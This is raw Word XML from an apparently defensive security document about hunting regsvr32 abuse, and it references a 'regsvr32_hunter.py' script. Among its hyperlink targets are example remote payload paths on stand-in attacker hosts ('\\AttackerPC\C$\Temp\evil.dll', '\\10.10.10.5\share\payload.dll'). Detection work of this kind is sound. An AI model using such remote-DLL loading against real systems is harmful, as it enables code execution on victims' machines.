      </w:pPr>
      <w:r w:rsidRPr="001B2F95">
        <w:t>python </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="001B2F95">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>regsvr32_hunter.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B2F95">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="000F6DFB" w:rsidRPr="001B2F95">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F95">
        <w:t>help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC8F5BC" w14:textId="77777777" w:rsidR="00282EE5" w:rsidRPr="00282EE5" w:rsidRDefault="00282EE5" w:rsidP="00366FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C554C0F" w14:textId="77777777" w:rsidR="0071548A" w:rsidRDefault="0071548A" w:rsidP="0071548A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AEC286A" w14:textId="77777777" w:rsidR="0064508F" w:rsidRPr="0071548A" w:rsidRDefault="0064508F" w:rsidP="0071548A"/>
    <w:sectPr w:rsidR="0064508F" w:rsidRPr="0071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9AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A5661F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B959DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C178A3F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D80C44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96A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7486"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2700B19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7C300A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="418CEC2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3E40A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C28A37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36207A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64EC4E3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56D30E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B021EF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807143"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1B462D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474015"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72D861A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1C026A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="916684E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A6078D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDBAC5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C3B0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C64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A070D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADA891B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D572C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51B4D4C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1E69BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA30046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6A2E8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B282A02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C21E77"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D98ECD2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DD3447"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="935A46E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C42DBD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC8A526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096A0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1944CD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F57009"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACD4B71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D131A4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="961E68D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1C414C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="722A2CA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8F1DC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF1CBF9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582DF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8164540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A143B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F496A2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042A55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FAA9AD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CB670A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B40B99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4F7F75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C4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D5ADC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04B027B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3D32E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3836C13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58A0F9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0ABE620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F4761A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2842E19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707EBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D48D65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B7153A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30D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420E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57E8F7C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D5D3F0D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07BE5DB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5265895">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="992560581">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="627323269">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="279265139">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1949510469">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1851527610">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1389645648">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="238565343">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="53621495">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="998385160">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1858159320">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="704913244">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="748773919">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="293873961">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1465587069">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1379160539">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1186749743">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="536091985">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="499002454">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="522790709">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="74788543">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1323657783">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1091587504">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="217785644">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="26150571">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1114638621">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="582181259">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="349644260">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="587546522">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1678658361">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1794862151">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="617301377">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="930167096">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1177235995">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1038555171">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="318003471">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1111360104">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="8908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B51"/>
    <w:rsid w:val="00004F10"/>
    <w:rsid w:val="00014EB4"/>
    <w:rsid w:val="0001764F"/>
    <w:rsid w:val="00027271"/>
    <w:rsid w:val="000469CC"/>
    <w:rsid w:val="00065960"/>
    <w:rsid w:val="00067899"/>
    <w:rsid w:val="00074184"/>
    <w:rsid w:val="00083843"/>
    <w:rsid w:val="000910BB"/>
    <w:rsid w:val="000917FC"/>
    <w:rsid w:val="000A2E44"/>
    <w:rsid w:val="000A512B"/>
    <w:rsid w:val="000B2047"/>
    <w:rsid w:val="000D477C"/>
    <w:rsid w:val="000D6F47"/>
    <w:rsid w:val="000E09FB"/>
    <w:rsid w:val="000F6DFB"/>
    <w:rsid w:val="001216B5"/>
    <w:rsid w:val="001227BF"/>
    <w:rsid w:val="001315D4"/>
    <w:rsid w:val="001532AF"/>
    <w:rsid w:val="001600E1"/>
    <w:rsid w:val="001700F9"/>
    <w:rsid w:val="001707F2"/>
    <w:rsid w:val="00173ED4"/>
    <w:rsid w:val="00176F22"/>
    <w:rsid w:val="00186A33"/>
    <w:rsid w:val="001903F0"/>
    <w:rsid w:val="001918CA"/>
    <w:rsid w:val="0019527F"/>
    <w:rsid w:val="001A02A9"/>
    <w:rsid w:val="001A19AB"/>
    <w:rsid w:val="001A2696"/>
    <w:rsid w:val="001A45FF"/>
    <w:rsid w:val="001A5277"/>
    <w:rsid w:val="001B2CC7"/>
    <w:rsid w:val="001B2F95"/>
    <w:rsid w:val="001C0B25"/>
    <w:rsid w:val="001C3734"/>
    <w:rsid w:val="001C46A8"/>
    <w:rsid w:val="001D3B1E"/>
    <w:rsid w:val="001D5EDD"/>
    <w:rsid w:val="001D75F5"/>
    <w:rsid w:val="001E0D2B"/>
    <w:rsid w:val="001F527D"/>
    <w:rsid w:val="00215AE3"/>
    <w:rsid w:val="00217E39"/>
    <w:rsid w:val="00232AF4"/>
    <w:rsid w:val="00234F83"/>
    <w:rsid w:val="002368E4"/>
    <w:rsid w:val="002429CC"/>
    <w:rsid w:val="00251FC9"/>
    <w:rsid w:val="00267ED9"/>
    <w:rsid w:val="00282EE5"/>
    <w:rsid w:val="0028440D"/>
    <w:rsid w:val="0029349A"/>
    <w:rsid w:val="00293967"/>
    <w:rsid w:val="0029621A"/>
    <w:rsid w:val="002978CE"/>
    <w:rsid w:val="002B1806"/>
    <w:rsid w:val="002E568C"/>
    <w:rsid w:val="002F383D"/>
    <w:rsid w:val="002F6D51"/>
    <w:rsid w:val="00306FB5"/>
    <w:rsid w:val="00312399"/>
    <w:rsid w:val="00332B6A"/>
    <w:rsid w:val="00336C9F"/>
    <w:rsid w:val="00340CA9"/>
    <w:rsid w:val="0034319C"/>
    <w:rsid w:val="003507EA"/>
    <w:rsid w:val="0035577E"/>
    <w:rsid w:val="0036142C"/>
    <w:rsid w:val="003660EC"/>
    <w:rsid w:val="00366FC5"/>
    <w:rsid w:val="003805B9"/>
    <w:rsid w:val="00392B91"/>
    <w:rsid w:val="0039611E"/>
    <w:rsid w:val="003A4084"/>
    <w:rsid w:val="003B3425"/>
    <w:rsid w:val="003B3BD7"/>
    <w:rsid w:val="003C4AA9"/>
    <w:rsid w:val="003E1B51"/>
    <w:rsid w:val="003F7F71"/>
    <w:rsid w:val="00406F04"/>
    <w:rsid w:val="00410270"/>
    <w:rsid w:val="00410AC9"/>
    <w:rsid w:val="00424982"/>
    <w:rsid w:val="004364E9"/>
    <w:rsid w:val="004626F7"/>
    <w:rsid w:val="0046327C"/>
    <w:rsid w:val="00471395"/>
    <w:rsid w:val="00471D5A"/>
    <w:rsid w:val="00477DB0"/>
    <w:rsid w:val="00485747"/>
    <w:rsid w:val="00494211"/>
    <w:rsid w:val="004968E4"/>
    <w:rsid w:val="00496D37"/>
    <w:rsid w:val="0049735C"/>
    <w:rsid w:val="004B0045"/>
    <w:rsid w:val="004D34FC"/>
    <w:rsid w:val="004D4DA7"/>
    <w:rsid w:val="004E4E19"/>
    <w:rsid w:val="004F4533"/>
    <w:rsid w:val="004F75D9"/>
    <w:rsid w:val="004F7B17"/>
    <w:rsid w:val="00500080"/>
    <w:rsid w:val="0050528F"/>
    <w:rsid w:val="00507119"/>
    <w:rsid w:val="0051441F"/>
    <w:rsid w:val="00520C43"/>
    <w:rsid w:val="00522040"/>
    <w:rsid w:val="00534C40"/>
    <w:rsid w:val="00552AD1"/>
    <w:rsid w:val="005608A8"/>
    <w:rsid w:val="005608EE"/>
    <w:rsid w:val="005629BA"/>
    <w:rsid w:val="005812DC"/>
    <w:rsid w:val="0058688A"/>
    <w:rsid w:val="0059172E"/>
    <w:rsid w:val="005A5331"/>
    <w:rsid w:val="005B3795"/>
    <w:rsid w:val="005B51D8"/>
    <w:rsid w:val="005D39E1"/>
    <w:rsid w:val="005D7463"/>
    <w:rsid w:val="005E13A4"/>
    <w:rsid w:val="005E575A"/>
    <w:rsid w:val="00620B5A"/>
    <w:rsid w:val="006262D9"/>
    <w:rsid w:val="00644033"/>
    <w:rsid w:val="0064508F"/>
    <w:rsid w:val="00646B19"/>
    <w:rsid w:val="00667067"/>
    <w:rsid w:val="00696A2C"/>
    <w:rsid w:val="006A3798"/>
    <w:rsid w:val="006A4154"/>
    <w:rsid w:val="006A4988"/>
    <w:rsid w:val="006A7155"/>
    <w:rsid w:val="006A76C3"/>
    <w:rsid w:val="006B7553"/>
    <w:rsid w:val="006C381A"/>
    <w:rsid w:val="006F24B4"/>
    <w:rsid w:val="00700123"/>
    <w:rsid w:val="007003C8"/>
    <w:rsid w:val="00700CD4"/>
    <w:rsid w:val="0071269F"/>
    <w:rsid w:val="0071548A"/>
    <w:rsid w:val="007273EC"/>
    <w:rsid w:val="0073182B"/>
    <w:rsid w:val="00732CE3"/>
    <w:rsid w:val="0074227B"/>
    <w:rsid w:val="00764E1A"/>
    <w:rsid w:val="00766F80"/>
    <w:rsid w:val="00787593"/>
    <w:rsid w:val="007C6119"/>
    <w:rsid w:val="007F278D"/>
    <w:rsid w:val="00805916"/>
    <w:rsid w:val="008129EA"/>
    <w:rsid w:val="00815D8F"/>
    <w:rsid w:val="00820CB3"/>
    <w:rsid w:val="00826329"/>
    <w:rsid w:val="008314AD"/>
    <w:rsid w:val="00833624"/>
    <w:rsid w:val="00834AA9"/>
    <w:rsid w:val="00845735"/>
    <w:rsid w:val="0085430C"/>
    <w:rsid w:val="008547A0"/>
    <w:rsid w:val="0086557C"/>
    <w:rsid w:val="008671B1"/>
    <w:rsid w:val="00875E9E"/>
    <w:rsid w:val="00882A3C"/>
    <w:rsid w:val="008A7102"/>
    <w:rsid w:val="008B6A34"/>
    <w:rsid w:val="008C487D"/>
    <w:rsid w:val="008D2D17"/>
    <w:rsid w:val="008E194A"/>
    <w:rsid w:val="008E50C5"/>
    <w:rsid w:val="008E58E1"/>
    <w:rsid w:val="008E5D74"/>
    <w:rsid w:val="00900546"/>
    <w:rsid w:val="0091754C"/>
    <w:rsid w:val="00923E7A"/>
    <w:rsid w:val="00925430"/>
    <w:rsid w:val="00925FD8"/>
    <w:rsid w:val="0093121E"/>
    <w:rsid w:val="00937DFA"/>
    <w:rsid w:val="009525E4"/>
    <w:rsid w:val="009647B4"/>
    <w:rsid w:val="00976525"/>
    <w:rsid w:val="00976BB1"/>
    <w:rsid w:val="00982F21"/>
    <w:rsid w:val="00984919"/>
    <w:rsid w:val="00984DBD"/>
    <w:rsid w:val="009A26F1"/>
    <w:rsid w:val="009A3B98"/>
    <w:rsid w:val="009B0F1B"/>
    <w:rsid w:val="009C5644"/>
    <w:rsid w:val="009D6284"/>
    <w:rsid w:val="009E10A5"/>
    <w:rsid w:val="009F2BA2"/>
    <w:rsid w:val="009F5DCD"/>
    <w:rsid w:val="00A0013F"/>
    <w:rsid w:val="00A02FFB"/>
    <w:rsid w:val="00A04C67"/>
    <w:rsid w:val="00A15DB6"/>
    <w:rsid w:val="00A160E0"/>
    <w:rsid w:val="00A2058D"/>
    <w:rsid w:val="00A233AE"/>
    <w:rsid w:val="00A23629"/>
    <w:rsid w:val="00A323A4"/>
    <w:rsid w:val="00A33659"/>
    <w:rsid w:val="00A33CE0"/>
    <w:rsid w:val="00A45096"/>
    <w:rsid w:val="00A5004C"/>
    <w:rsid w:val="00A521D9"/>
    <w:rsid w:val="00A52C50"/>
    <w:rsid w:val="00A64950"/>
    <w:rsid w:val="00A65DC2"/>
    <w:rsid w:val="00A67A57"/>
    <w:rsid w:val="00A75D9C"/>
    <w:rsid w:val="00A80BDC"/>
    <w:rsid w:val="00A90E1F"/>
    <w:rsid w:val="00A90F84"/>
    <w:rsid w:val="00AC481F"/>
    <w:rsid w:val="00AC48FB"/>
    <w:rsid w:val="00AD464A"/>
    <w:rsid w:val="00B118DD"/>
    <w:rsid w:val="00B15509"/>
    <w:rsid w:val="00B2219C"/>
    <w:rsid w:val="00B449B3"/>
    <w:rsid w:val="00B46523"/>
    <w:rsid w:val="00B54279"/>
    <w:rsid w:val="00B56574"/>
    <w:rsid w:val="00B64D5B"/>
    <w:rsid w:val="00B677A3"/>
    <w:rsid w:val="00B81D17"/>
    <w:rsid w:val="00B86188"/>
    <w:rsid w:val="00B86927"/>
    <w:rsid w:val="00B96F02"/>
    <w:rsid w:val="00BA5778"/>
    <w:rsid w:val="00BA6779"/>
    <w:rsid w:val="00BA7D84"/>
    <w:rsid w:val="00BC491F"/>
    <w:rsid w:val="00BC724B"/>
    <w:rsid w:val="00BE2DBD"/>
    <w:rsid w:val="00BE3EEE"/>
    <w:rsid w:val="00BF2948"/>
    <w:rsid w:val="00BF76D1"/>
    <w:rsid w:val="00BF7DE5"/>
    <w:rsid w:val="00C01ED1"/>
    <w:rsid w:val="00C07C48"/>
    <w:rsid w:val="00C07E5E"/>
    <w:rsid w:val="00C119A6"/>
    <w:rsid w:val="00C13900"/>
    <w:rsid w:val="00C13D48"/>
    <w:rsid w:val="00C23E35"/>
    <w:rsid w:val="00C42CF2"/>
    <w:rsid w:val="00C44568"/>
    <w:rsid w:val="00C47F61"/>
    <w:rsid w:val="00C5381B"/>
    <w:rsid w:val="00C53DB5"/>
    <w:rsid w:val="00C81899"/>
    <w:rsid w:val="00C9243B"/>
    <w:rsid w:val="00C97718"/>
    <w:rsid w:val="00CA5B87"/>
    <w:rsid w:val="00CA614E"/>
    <w:rsid w:val="00CC02BA"/>
    <w:rsid w:val="00CC044E"/>
    <w:rsid w:val="00CC4BCB"/>
    <w:rsid w:val="00CD5F92"/>
    <w:rsid w:val="00CE04AB"/>
    <w:rsid w:val="00CE30C9"/>
    <w:rsid w:val="00CE3B0D"/>
    <w:rsid w:val="00CF4595"/>
    <w:rsid w:val="00CF68B8"/>
    <w:rsid w:val="00D00FA2"/>
    <w:rsid w:val="00D01F9F"/>
    <w:rsid w:val="00D10637"/>
    <w:rsid w:val="00D108BE"/>
    <w:rsid w:val="00D21F3D"/>
    <w:rsid w:val="00D23508"/>
    <w:rsid w:val="00D51D1C"/>
    <w:rsid w:val="00D557AF"/>
    <w:rsid w:val="00D65978"/>
    <w:rsid w:val="00D65A3E"/>
    <w:rsid w:val="00D773D6"/>
    <w:rsid w:val="00D974D0"/>
    <w:rsid w:val="00DB02AA"/>
    <w:rsid w:val="00DB6DA8"/>
    <w:rsid w:val="00DD32BF"/>
    <w:rsid w:val="00E07FA9"/>
    <w:rsid w:val="00E130C0"/>
    <w:rsid w:val="00E14040"/>
    <w:rsid w:val="00E22439"/>
    <w:rsid w:val="00E302BC"/>
    <w:rsid w:val="00E3114F"/>
    <w:rsid w:val="00E32609"/>
    <w:rsid w:val="00E36720"/>
    <w:rsid w:val="00E53403"/>
    <w:rsid w:val="00E654AD"/>
    <w:rsid w:val="00E67004"/>
    <w:rsid w:val="00E775FF"/>
    <w:rsid w:val="00E85754"/>
    <w:rsid w:val="00E921F3"/>
    <w:rsid w:val="00E96204"/>
    <w:rsid w:val="00E96C01"/>
    <w:rsid w:val="00EA0623"/>
    <w:rsid w:val="00EA0E56"/>
    <w:rsid w:val="00EA2A6F"/>
    <w:rsid w:val="00EA6F08"/>
    <w:rsid w:val="00EB3B41"/>
    <w:rsid w:val="00EB4251"/>
    <w:rsid w:val="00EC7418"/>
    <w:rsid w:val="00ED17C2"/>
    <w:rsid w:val="00ED4CC2"/>
    <w:rsid w:val="00EF4FD1"/>
    <w:rsid w:val="00EF58BA"/>
    <w:rsid w:val="00F0020C"/>
    <w:rsid w:val="00F204D8"/>
    <w:rsid w:val="00F20945"/>
    <w:rsid w:val="00F326C0"/>
    <w:rsid w:val="00F42025"/>
    <w:rsid w:val="00F45A9C"/>
    <w:rsid w:val="00F541AD"/>
    <w:rsid w:val="00F5634F"/>
    <w:rsid w:val="00F66947"/>
    <w:rsid w:val="00F70620"/>
    <w:rsid w:val="00F75D0C"/>
    <w:rsid w:val="00F84C1A"/>
    <w:rsid w:val="00F87D4A"/>
    <w:rsid w:val="00F9115D"/>
    <w:rsid w:val="00FA21D4"/>
    <w:rsid w:val="00FA4882"/>
    <w:rsid w:val="00FB47E6"/>
    <w:rsid w:val="00FB4B0A"/>
    <w:rsid w:val="00FB61A8"/>
    <w:rsid w:val="00FC26CC"/>
    <w:rsid w:val="00FC2DE6"/>
    <w:rsid w:val="00FC3C83"/>
    <w:rsid w:val="00FD1C8D"/>
    <w:rsid w:val="00FE1489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A786"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B912FDA8-6B39-4CB7-89B7-4C323DC8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48A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003E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8B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8B8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E1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E1B51"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="003E1B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E1B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E1B51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48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cybersoc.my/app/r/s/uVhAN" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/5VASN" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/bLNA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Danish%20Adi/AppData/Local/Programs/Microsoft%20VS%20Code/resources/app/out/vs/code/electron-browser/workbench/workbench.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/ZREPK" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/NiwVK" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/OBP5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\\AttackerPC\C$\Temp\evil.dll" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="vscode-file://vscode-app/c:/Users/Danish%20Adi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rtal.cybersoc.my/app/r/s/ZyF3d" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/81qXv" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="vscode-file://vscode-app/c:/Users/Danish%20Adi/AppData/Local/Programs/Microsoft%20VS%20Code/resources/app/out/vs/code/electron-browser/workbench/workbench.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/W6HcFwHAIz0?si=RtIxTMlVtmN8c0Lb" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\10.10.10.5\share\payload.dll" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="vscode-file://vscode-app/c:/Users/Danish%20Adi/AppData/Local/Programs/Microsoft%20VS%20Code/resources/app/out/vs/code/electron-browser/workbench/workbench.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/5ZAsu" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="vscode-file://vscode-app/c:/Users/Danish%20Adi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al.cybersoc.my/app/r/s/fOjXc" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portal.cybersoc.my/app/r/s/B7fFf" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="vscode-file://vscode-app/c:/Users/Danish%20Adi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2617</TotalTime>
  <Pages>3</Pages>
  <Words>2171</Words>
  <Characters>12377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BIN ADI YUSRI</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MUHAMMAD DANISH BIN ADI YUSRI</cp:lastModifiedBy>
  <cp:revision>299</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-23T01:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-06T10:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>